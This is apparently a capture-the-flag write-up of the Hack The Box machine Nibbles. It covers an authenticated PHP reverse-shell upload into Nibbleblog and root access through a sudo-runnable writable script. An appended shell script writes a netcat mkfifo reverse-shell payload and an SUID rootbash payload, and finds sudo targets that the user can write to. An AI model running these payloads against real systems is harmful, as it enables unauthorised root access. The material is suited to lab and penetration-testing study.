Hack The Box — Nibbles

ZeusCybersec
6 min read · Feb 9, 2022

Nibbles is an Easy Linux box on Hack The Box and is also OSCP-like. Here we get remote code execution on the Nibbleblog CMS through an authenticated file upload, then escalate privileges through a sudo rule on a writable script.

ENUMERATION

We find ports 80 and 22 open. The source code of the default homepage on port 80 hints that we should check out the /nibbleblog directory.

On /nibbleblog we discover a CMS where we can see posts, and at the bottom right it shows the name of the CMS as Nibbleblog. However, we don't know its version yet and are also unable to find the login page.

Let's run dirsearch to find hidden directories and files.

The /README file reveals crucial details about the Nibbleblog CMS, such as its version, 4.0.3, which helps us find exploits later.

Make sure to check out the other files and directories as well for any useful info. (I remember finding the username "admin" in one of the directories.)

We don't find anything else in the directories other than the files and configuration of the running CMS. I was also unable to find an admin login page. Let's look for an exploit for this version of Nibbleblog.

Of the many near-identical exploits for CVE-2015-6967 (an authenticated arbitrary file upload in Nibbleblog's My image plugin), we find one written in Python on GitHub: https://github.com/dix0nym/CVE-2015-6967/blob/main/exploit.py

See the image below. If you read its code carefully, you will notice that it requests /admin.php. So the admin login page is at admin.php, not /admin. Reading further, the script does little more than what you could do by hand: it logs in at admin.php with the credentials you supply, then uploads a PHP reverse shell through the My image plugin. (This can also be done manually.)

The code tries to open admin.php

Upon further research using Google, I found this useful blog giving a step-by-step guide on how to get a reverse shell from Nibbleblog: https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/

If you look at the image below carefully, the URL contains admin.php, another hint for the admin login page.

So finally, let's log in to the admin login page at /nibbleblog/admin.php.

I tried admin:admin, admin:root, admin:password and admin:nibbles, and the last one finally worked! (To be honest, I got the password as a spoiler while using Google. Nibbleblog itself is a real open-source CMS, but the box is named Nibbles after it, so while googling I was getting tons of hints for this machine and Google was also showing writeups.)

Anyway, you can also brute-force the password with the rockyou.txt wordlist, since the password is in it.

We are in! Go to PLUGINS and open the configuration of the My image plugin,

where we can upload our PHP reverse shell (you can download it from the pentestmonkey GitHub repo).

After the reverse shell has been uploaded, you have to visit the directory shown below to locate the uploaded file. (I found this location by reading the blog shared above.)

Start a netcat listener and open image.php, which executes the reverse shell and gives us a connection on netcat.

We got a low-privilege shell!

I ran the Python pty command to stabilize the shell, but Python is not present on the box. When I ran sudo -l to see what I can run as root, I found an executable file called monitor.sh.

I went to the location of monitor.sh and saw a personal.zip file, which I extracted with the unzip command.

I ran ls -la in the directory where monitor.sh is located to see its permissions. We have full read, write and execute permissions on it. That is the real bug here: sudo lets us run the script as root, and the script itself is writable by our low-privileged user. All we need to do is change the contents of this file and run it with sudo.

I looked inside the file and it seemed to be some server health monitoring script. Anyway, who cares... let's go with our plan.

I put a one-liner netcat reverse shell in monitor.sh (you can find it on the pentestmonkey website).

As you can see above, I put the netcat reverse shell in monitor.sh and ran it with sudo (since we are allowed to run monitor.sh as root without a password).

On our netcat listener we get a shell as root!

we are ROOT!!!!

DO NOTE: I had initially tried the rootbash method instead of the netcat reverse shell. If you haven't heard of it, read this info from my notes.

However, it did not work in my case. At the time I concluded that monitor.sh lacked the SUID bit because its ls -la permissions started with rwx rather than srwx. That reading is wrong on two counts: the SUID bit appears as an s in the owner's execute position (for example -rwsr-xr-x), not in the first column, which only shows the file type, and Linux ignores SUID on scripts anyway. The rootbash method does not need monitor.sh to be SUID at all. Since sudo already runs the script as root, the script can do cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash, after which /tmp/rootbash -p gives a root shell without any listener.
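The privilege escalation above, and the SUID point just discussed, as an added shell example that is not from the writeup: sudo_writable_targets parses sudo -l output and prints every command path the current user can write to (the monitor.sh situation), has_suid tests the SUID bit the way ls -la does not make obvious, and the two write_* functions produce either payload for a script that sudo runs as root. The sudo -l text in the demo is constructed, not captured from the box, and the listener address is a placeholder.

```sh
#!/bin/sh
# Added example: sudo-writable-script privilege escalation helpers (POSIX sh).

# Print each command path from `sudo -l` output that the current user can modify.
# Entry lines look like "(root) NOPASSWD: /path/to/script"; the runas and tag
# prefixes are stripped, comma-separated commands are split, arguments dropped.
sudo_writable_targets() {
    printf '%s\n' "$1" |
    grep '^[[:space:]]*(' |
    sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*([A-Z]+:[[:space:]]*)*//' |
    tr ',' '\n' |
    while read -r cmd; do
        target=${cmd%% *}                      # keep the path, drop arguments
        if [ -n "$target" ] && [ -w "$target" ]; then
            printf '%s\n' "$target"
        fi
    done
}

# The SUID bit is the s in the owner execute slot (-rwsr-xr-x), not the first column.
has_suid() { [ -u "$1" ]; }

# Payload 1: pentestmonkey-style netcat reverse shell (works with nc builds lacking -e).
write_reverse_shell() {   # usage: write_reverse_shell SCRIPT LHOST LPORT
    printf '#!/bin/bash\nrm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc %s %s >/tmp/f\n' \
        "$2" "$3" > "$1"
}

# Payload 2: "rootbash". sudo runs the script as root, so the script itself can
# drop an SUID copy of bash; afterwards /tmp/rootbash -p keeps the root euid.
write_rootbash() {        # usage: write_rootbash SCRIPT
    printf '#!/bin/bash\ncp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash\n' > "$1"
}

# Demo on constructed data: a writable script in a temp dir plus fake sudo -l output.
demo() {
    dir=$(mktemp -d)
    touch "$dir/monitor.sh" && chmod 700 "$dir/monitor.sh"
    sample="User lowpriv may run the following commands on host:
    (root) NOPASSWD: $dir/monitor.sh
    (root) /usr/bin/does-not-exist"
    echo "writable sudo targets:"
    sudo_writable_targets "$sample"
    write_rootbash "$dir/monitor.sh"
    has_suid "$dir/monitor.sh" || echo "monitor.sh has no SUID bit, and does not need one"
    cat "$dir/monitor.sh"
    rm -rf "$dir"
}

[ "${1:-}" = "demo" ] && demo
```

On a real box, feed it live output with sudo_writable_targets "$(sudo -ln)", write one of the payloads into the path it prints, and run that path with sudo; the reverse shell variant needs the listener up first, the rootbash variant needs nothing but a second command afterwards.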

CONCLUSION

Other than finding the admin login page, I found this box pretty easy and fun. I hope you learned something from this writeup. Make sure you follow me here on Medium for more OSCP-like writeups. -ZEUS


ZeusCybersec

I am a Penetration Tester, currently pursuing OSCP, skilled in network pentesting and developing security tools in Python. YouTube: ZeusCybersec